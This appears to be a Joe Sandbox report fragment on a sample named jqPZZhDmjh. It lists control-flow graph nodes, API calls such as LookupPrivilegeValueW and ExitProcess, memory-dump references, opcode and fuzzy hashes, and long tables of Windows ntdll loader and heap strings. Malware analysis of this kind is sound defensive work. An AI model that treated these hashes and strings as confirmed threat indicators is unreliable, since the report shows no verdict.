                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                                                            • Instruction ID: d2866c5b8f4d925e42b3f6a3853711313f6a68db5a74f00abbcbd645121d6d71
                                                                            • Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                                                            • Instruction Fuzzy Hash: 2001A772A8022877E721B6949C07FFF776C6B80F50F044154FF08BA2C2E6A4690647F6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 259 98a7b1-98a7b7 260 98a7e9-98a7f4 LookupPrivilegeValueW 259->260 261 98a7ba-98a7bd 259->261 262 98a81a-98a830 call 98af50 261->262 263 98a7bf-98a819 261->263 263->262
                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0097F1C2,0097F1C2,0000003C,00000000,?,00979D55), ref: 0098A7F0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            • Opcode ID: a941718e14f809540f9cb1fcdd1daa2e2fcc0822d0c77d51cbeff7b1a986ba12
                                                                            • Instruction ID: a0a0e825f8a86ce7bedfea212b38ff57ce79962aa0137186fc22bb28a66d64ad
                                                                            • Opcode Fuzzy Hash: a941718e14f809540f9cb1fcdd1daa2e2fcc0822d0c77d51cbeff7b1a986ba12
                                                                            • Instruction Fuzzy Hash: 0DE01AB6604251AFE724FBA8EC818EBB32DEF843647218857F84897305C635D92587B2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 268 98a620-98a651 call 98af50 RtlAllocateHeap
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00984526,?,00984C9F,00984C9F,?,00984526,?,?,?,?,?,00000000,00979CE3,?), ref: 0098A64D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                            • Instruction ID: 0bf7734e3aaa40cdd6cdf8f8cc6b7efd4d6aa303428a9fc21a483a848093a233
                                                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                            • Instruction Fuzzy Hash: 93E012B1200208ABDB14EF99CC41EA777ACAF88654F118559BA1C5B242C630F9108BB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 271 98a660-98a676 272 98a67c-98a6cc RtlFreeHeap call 98af50 ExitProcess 271->272 273 98a677 call 98af50 271->273 273->272
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00979CE3,?,?,00979CE3,00000060,00000000,00000000,?,?,00979CE3,?,00000000), ref: 0098A68D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                            • Instruction ID: a8f4f2178863feaeba54758fc87f55582658efdf7af2b32b6a3972f13e0eb506
                                                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                            • Instruction Fuzzy Hash: 42E012B1200208ABDB18EF99CC49EA777ACAF88750F018559BA1C5B242C630E9108AB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 277 98a7c0-98a7f4 call 98af50 LookupPrivilegeValueW
                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0097F1C2,0097F1C2,0000003C,00000000,?,00979D55), ref: 0098A7F0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                            • Instruction ID: 231f0dea0891bd2113a03678ab69d47139417e04a4eca9ae88cf3fdff10363f7
                                                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                            • Instruction Fuzzy Hash: BCE01AB1200208ABDB10EF49CC85EE737ADAF88650F018155BA0C57241C934E8108BF5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0098A6C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitProcess
                                                                            • String ID:
                                                                            • API String ID: 621844428-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-2160512332
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim user DLL$LdrpGetShimuserInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_Initializeuser$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-3089669407
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 01655FE1
                                                                            • @, xrefs: 016563A0
                                                                            • LanguageConfigurationPending, xrefs: 01656221
                                                                            • @, xrefs: 01656027
                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0165635D
                                                                            • InstallLanguageFallback, xrefs: 01656050
                                                                            • @, xrefs: 016561B0
                                                                            • LanguageConfiguration, xrefs: 01656420
                                                                            • PreferredUILanguagesPending, xrefs: 016561D2
                                                                            • Control Panel\Desktop, xrefs: 0165615E
                                                                            • PreferredUILanguages, xrefs: 016563D1
                                                                            • @, xrefs: 01656277
                                                                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 01655A84
                                                                            • @, xrefs: 0165647A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                            • API String ID: 0-1325123933
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • Critical section debug info address, xrefs: 0162541F, 0162552E
                                                                            • undeleted critical section in freed memory, xrefs: 0162542B
                                                                            • 8, xrefs: 016252E3
                                                                            • corrupted critical section, xrefs: 016254C2
                                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01625543
                                                                            • Critical section address., xrefs: 01625502
                                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016254CE
                                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016254E2
                                                                            • Address of the debug info found in the active list., xrefs: 016254AE, 016254FA
                                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0162540A, 01625496, 01625519
                                                                            • Thread identifier, xrefs: 0162553A
                                                                            • Invalid debug info address of this critical section, xrefs: 016254B6
                                                                            • double initialized or corrupted critical section, xrefs: 01625508
                                                                            • Critical section address, xrefs: 01625425, 016254BC, 01625534
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                            • API String ID: 0-2368682639
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016225EB
                                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 0162261F
                                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016222E4
                                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01622409
                                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01622498
                                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01622602
                                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016224C0
                                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01622506
                                                                            • @, xrefs: 0162259B
                                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01622412
                                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01622624
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                            • API String ID: 0-4009184096
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                            • API String ID: 0-360209818
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                            • API String ID: 0-2515994595
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                            • API String ID: 0-3591852110
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                            • API String ID: 0-3197712848
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                            • API String ID: 0-3532704233
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                            • API String ID: 0-1357697941
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                            • API String ID: 0-1700792311
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • VerifierFlags, xrefs: 01638C50
                                                                            • AVRF: -*- final list of providers -*- , xrefs: 01638B8F
                                                                            • HandleTraces, xrefs: 01638C8F
                                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01638A67
                                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01638A3D
                                                                            • VerifierDlls, xrefs: 01638CBD
                                                                            • VerifierDebug, xrefs: 01638CA5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                            • API String ID: 0-3223716464
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                            • API String ID: 0-1109411897
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-523794902
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                            • API String ID: 0-4098886588
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                            • API String ID: 0-122214566
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-792281065
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • Loading the shim user DLL failed with status 0x%08lx, xrefs: 01609A2A
                                                                            • apphelp.dll, xrefs: 015A6496
                                                                            • LdrpInitShimEngine, xrefs: 016099F4, 01609A07, 01609A30
                                                                            • Getting the shim user exports failed with status 0x%08lx, xrefs: 01609A01
                                                                            • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 016099ED
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01609A11, 01609A3A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-204845295
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01622178
                                                                            • RtlGetAssemblyStorageRoot, xrefs: 01622160, 0162219A, 016221BA
                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01622180
                                                                            • SXS: %s() passed the empty activation context, xrefs: 01622165
                                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0162219F
                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016221BF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                            • API String ID: 0-861424205
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • Loading import redirection DLL: '%wZ', xrefs: 01628170
                                                                            • LdrpInitializeProcess, xrefs: 015EC6C4
                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01628181, 016281F5
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 015EC6C3
                                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 016281E5
                                                                            • LdrpInitializeImportRedirection, xrefs: 01628177, 016281EB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                            • API String ID: 0-475462383
